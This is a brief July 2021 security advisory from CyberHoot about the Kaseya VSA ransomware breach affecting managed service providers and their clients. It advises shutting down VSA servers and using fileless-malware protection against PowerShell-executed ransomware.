July 2nd, 2021: CyberHoot received notification of a critical breach of businesses today through the 3rd largest Remote Monitoring and Management (RMM) vendor Kaseya. While it remains unclear how hackers breached Kaseya’s solution, what is clear is that at least 8 MSPs and 200 clients are dealing with a ransomware attack. Kaseya support has asked all clients to shut down their local VSA management consoles after having shut down their cloud environment earlier today. Early indications are that remote access, combined with stolen credentials, and administrative privileges have enabled hackers to carry out this ransomware attack. It has been reported on Reddit and other sites (unsubstantiated), that hackers used both Kaseya and/or Webroot to execute Sodinokibi ransomware through PowerShell scripting.  CyberHoot will continue to monitor this situation and provide updates to this article.

What To Do

If you’re a Kaseya client, per this Client Advisory, you must shut down your VSA Server immediately and until further notice.

The execution through PowerShell would likely not be stopped by several security solutions, due to malware running through a trusted scripting engine, not an executable file. To effectively avoid this threat, users must deploy a security solution that has a fileless malware prevention component.